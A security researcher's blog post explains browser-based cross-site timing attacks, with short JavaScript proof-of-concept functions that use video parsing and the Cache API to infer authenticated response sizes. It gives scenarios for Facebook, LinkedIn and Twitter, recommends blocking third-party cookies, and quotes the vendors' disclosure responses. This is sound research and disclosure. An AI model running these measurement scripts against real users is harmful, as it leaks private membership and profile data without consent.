Timing Attacks in the Modern WebThe Clock is Still Ticking

Before you explore all the details of these browser-based timing attacks, head over to my laboratories to play around with these attacks yourself!

Timing attacks have been known for a long time. One of the earliest, and possibly the most well-known attacks that leverage timing as side-channel information, are those reported by Paul Kocher in 1996 (to give you an idea, that’s around the same time cookies were first introduced to the web). In his paper, Kocher describes that by measuring the execution time of private key operations, it becomes possible to factor RSA keys and break other cryptosystems such as Diffie-Hellman. After all these years, timing attacks are still highly relevant (you may have heard about the Lucky 13 attack).

In the context of the web, one of the earliest mentions of timing attacks was in 2007, by Bortz and Boneh. In their work, the researchers introduced two types of web-based timing attacks: direct timing attacks and cross-site timing attacks. The former describes the scenario where the adversary directly (hence the name) interacts with the web server. For instance, by measuring the time the server takes to process a POST request to the /login endpoint, the attacker can infer the existence of a username. Similarly, when passwords are checked character by character, the adversary can leverage the timing information to figure out at which position the password comparison failed, and use this information to reveal a victim’s password.

Cross-site Timing Attacks

The remainder of this post will focus on the other type of timing attack, namely the cross-site timing attack. The main difference with direct timing attacks is that in this scenario, it is not the attacker that sends out requests to the targeted website. Instead, by using JavaScript, the attacker triggers to send out carefully crafted requests. As part of the timing attack, the adversary measures the time it takes for the client to download the associated resource. It is important to note here that the requests sent out by the victim are authenticated, i.e. they contain the Cookie header. This means that the response that is returned to the victim will be based on the state of that victim with the targeted website.

Here’s an example that should help you visualize this more easily. Let’s assume there is a popular social network https://social.com consisting of two groups: “The Force” and “The Dark Side”. The groups can be reached at the endpoints /the-force/ and /the-dark-side/, but the content posted in the group can only be accessed by members of the group, otherwise a short error message is returned. Now, when the victim is visiting some random website (e.g. this one), it may contain some malicious JavaScript written by the attacker (either from the website itself, or from a third-party source). The attacker will use this malicious JavaScript to figure out which group victims belongs to, thereby violating their privacy. This JavaScript could be as simple as this:

function getMeasurement(url, callback) {
    var i = new Image();
    i.addEventListener('error', function() {
        var end = performance.now();
        callback(end - start);
    });
    var start = performance.now();
    i.src = url;
}
getMeasurement('https://social.com/the-force/', function(timeTF) {
    getMeasurement('https://social.com/the-dark-side', function(timeTDS) {
        if (timeTF > timeTDS) {
            alert('The force is with you!');
        }
        else {
            alert('All hail the Dark Lord!');
        }
    });
});

In theory, this works like a charm. In practice however, there are many factors that prevent this attack from working reliably. One of the main reasons is that networks (especially wireless ones) are not entirely stable, and since the request is made over the victim’s network, the attacker can not try to improve this. Networks suffer from congestion, jitter and brief interruptions. Any of these factors would ruin the attacker’s attempt to detect the victim’s membership. To make matters worse (in the attacker’s point of view), most resources are sent with gzip compression, making the difference in resource size (and thus the timing measurement) even smaller. This is most likely why we haven’t seen any news headlines describing attackers used cross-site timing attacks to steal private information.

Browser-based Timing Attacks

As part of the research I do at the university of Leuven, I set out to explore these cross-site timing attack in more detail. This lead to the discovery of a new class of timing attacks, namely “browser-based timing attacks”. Instead of relying on the unstable network download time, these attacks leverage side-channel leaks in browsers to measure the time the browser takes to process resources. More concretely, the timing measurement starts right after the resource has been downloaded (thereby avoiding jitter from the network), and stops after it has been processed.

I discovered four different browser functionalities that can be abused for the purpose of launching these attacks: <video> parsing, <script> parsing, disk storage (Cache API) and storage retrieval (ApplicationCache). In this post, I will only discuss the <video> parsing and disk storage attacks. If you’re interested in the details of the other attacks, have a look at our paper.

Video-parsing Attack

If you were expecting an elaborate attack with many complex formulae, I am sorry to disappoint you. In fact, it’s as simple as the one above:

function getMeasurement(url, callback) {
    var v = document.createElement('video');
    var start;
    v.addEventListener('suspend', function() {
        start = performance.now();
    });
    v.addEventListener('error', function() {
        var end = performance.now();
        callback(end - start);
    });
    v.src = url;
}

The main difference with the network-based cross-site timing attack, is that the start of the measurement now is when the suspend event fires. According to the HTML5 Standard, the suspend event is fired when the user agent is no longer downloading the resource. Because the targeted resource is not an actual video, and only a few tens or hundreds kB in size, the event will fire when the resource has been downloaded. After this, the browser will try to parse the resource as a video. Of course, HTML/JSON/… files are not valid video formats, so the browser will trigger the error event on the <video> element. But interestingly, the time it takes for the browser to come to this decision is related to the size of the resource, exactly what the attacker is interested in.

Although this technique overcomes the influence of the network condition, getting just a single measurement for each endpoint might not be sufficient to make it reliable. Instead, the attacker should obtain multiple measurements, and take the average or median. In most cases (except when the Cache-Control header contains the no-store directive), the attacker can simply leverage AppCache to force the browser to download and cache the resource. By doing so, only a single request will be sent to the target website, and obtaining an additional measurement only takes 3-5ms.

It should be noted that this attack does not work in Firefox because it strictly verifies the Content-Type of the response.

Cache Storage Attack

The Cache API, which aims to replace AppCache, provides developers with a fully programmable cache. More concretely, the Cache API can be used to store, retrieve and delete any type of response. Really, any type of response: cross-origin, authenticated, served with the no-store directive, you name it.

Writing a resource to the disk takes a certain amount of time, which is related to the size of that resource (writing 1 byte will obviously be much faster than writing 1GB). If we can measure the time the browser takes to do this, we can again get an estimate of the response size. I wouldn’t be writing this if it weren’t the case, so without further ado, this is what the cache storage timing attack looks like:

function getMeasurement(url, callback) {
    fetch(url, {mode: "no-cors", credentials: "include"}).then(function(resp) {
        setTimeout(function() {
            caches.open('attackz0r').then(function(cache) {
                var start = performance.now();
                cache.put(new Request('foo'), resp.clone()).then(function() {
                    var end = performance.now();
                    callback(end - start);
                });
            });
        }, 3000);
    });
}

If you are not familiar with the Fetch API or Promises, this may look a bit more complicated, but in fact it is simply placing a Response into the cache. What’s important to note is that on the second line, I passed following options to fetch(): {mode: "no-cors", credentials: "include"}. Basically, this makes sure that the fetch algorithm does not use the Cross-Origin Resource Sharing (CORS) mechanism, and include the cookies with the request (which is important, because we want the response to be specific to the user). Also, because the Promise returned by fetch() resolves as soon as the first byte of the response is received (and not when the complete response is in), I used the very naive setTimeout method to wait for the response to be downloaded. This can be easily improved by first having a round of cache.put() and cache.delete(). Anyways, the take-away message is that we can measure the storage time, and use that to infer the length of the response.

Performance

To evaluate the performance of these new browser-based timing attacks, we performed an experiment. We tried to measure the time it would take for an attacker to reliably, i.e. with 95% certainty, determine whether one resource is larger than the other. We did this for files where the difference in file size was 5kb - 100kb, with 5kb increments. The experiments had the following results:

From the graph, it is immediately clear that, especially for resources where the difference in resource size is small, the browser-based attacks outperform the classic attacks that rely on the network download time. Also interesting to note here, is that the experiments were executed on our university’s (relatively stable) network. Nevertheless, for the case where the difference in resource size was 40kB, the classic method failed to point out the largest of the two resources.

Real-world Consequences

Now we know that there are techniques that can provide attackers with an estimate of the resource size, why should we care about it? Detecting group membership on social networks may not seem that impressive at first sight. However, if the attacker manages to find enough groups you belong to, he can make an intersection of the members of all these groups and potentially find out your identity (again, the attacker is not supposed to know anything about your identity on other websites).

By looking at some popular websites, a number of other attack scenarios were discovered. I will give a brief overview of some of them, if you’re interested in the details, have a look at the paper. I have also set up an attack playground where you can try out some of these attacks yourself.

Facebook provides pages the ability to limit the audience that can see a certain post based on the users’ demographics (age, gender, location, language). For instance, I can create a post that can only be viewed by users of 27 years old. For all other users, an error message saying that the content is not accessible will be returned. These two different responses differ in size, and can therefore be used determine whether a user belongs to the one group (users of the age 27), or the other group (users younger or older than 27). The same goes for all the other demographic features.

On LinkedIn, you can search through your contacts based on certain criteria. An attacker can send the same requests, and pick the criteria he wants to know more about. By looking at the response sizes, an attacker can determine where the majority of your connections live, work, and what their job title is.

Twitter users can “protect” their account, which makes their Tweets invisible to anyone who does not follow them. The response size for the profile of following users will thus be larger than that of non-following users.

Defense Mechanisms

There are many opportunities to mitigate these attacks. Unfortunately, very little methods can be used to completely thwart these attacks. In my opinion, one of the best candidates is to disable third-party cookies. Not only does it prevent all types of cross-site timing attacks, it also prevents attacks such as cross-site request forgery (CSRF) and cross-site script inclusion (XSSI). In fact, all cross-site attacks are prevented by block third-party cookies (note: XSS is not really a cross-site attack, it was just badly named). The reason this works is because if there are no cookies attached to the requests triggered by the attacker, no user-specific content is returned, so there’s simply nothing for the attacker to steal. By default, all browsers allow third-party cookies, but most of them provide a setting that allows you to block them. I suggest you go ahead and do that right away, you will be surprised by the little impact this has on your typical browsing experience.

Disclosure

We reported these issues to various parties, both browser vendors as well as websites. Below are a few of their responses.

Chromium

Bug report

Response:

Thanks for reporting this. It seems like this is very similar to another report about cache-based side channel attacks from “The spy in the sandbox,” so I’m marking this as a duplicate. Please take a look at the other bug.

Note: These attacks have absolutely nothing in common with those from “The spy in the sandbox”.

Firefox

Bug report

Most relevant response:

This isn’t an issue Firefox can solve on its own; much of it is inherent in the design of the features. After the paper is published we can work with Chrome folks and other browser vendors to see if there are any reasonable ways to address this

Note: Since then (October 2015), nothing has changed.

Facebook

Response:

We ended up discussing this at length with the Facebook Security Team, and at the time we do not plan to make any changes to our site.

LinkedIn

Response:

  1. With regard to determining the general geographic region of a member, this is configurable by our members as to how much information they would like to share, in terms of the specificity of location, down to a city/zip code level. This information is not expected to be private, so we don’t consider that aspect a vulnerability.

  2. With regards to the connection status of two members, this is considered semi-private. There are limitations as to who can see this information, but it is never expected to be 100% private, as first degree members will always be able to see related connections. Do you have any proof of concept code, demonstrating the ability to exploit this in the described manner, that you’d be willing to share with us? If it is possible to exploit in the manner described, we would like to address this.

  3. The relationship of a member to a company is not considered private information on our site, so we don’t consider that aspect a vulnerability.

Note: From the response, it would seem that my report was misunderstood. It doesn’t matter that the information that is leaked is not considered private, what matters is that any website I visit can now learn all this information about me. Online advertising agencies are already building a very extensive profile of me, I don’t want that profile to also include all the information I share on social networks. I want every site I visit to only be able to know things about me that I explicitly shared with them.

What’s next?

Unfortunately, these browser-based timing attacks are not the only method that can be used to obtain the response size. In a few days, Mathy and I will give a talk at Black Hat on how we can leverage TCP windows to determine the exact length of responses on the network level. The week after, we will present our research on techniques that can be used to expose the size of cross-origin resources at USENIX Security. Spoiler: we introduce two new techniques to get the exact size of cross-origin resources.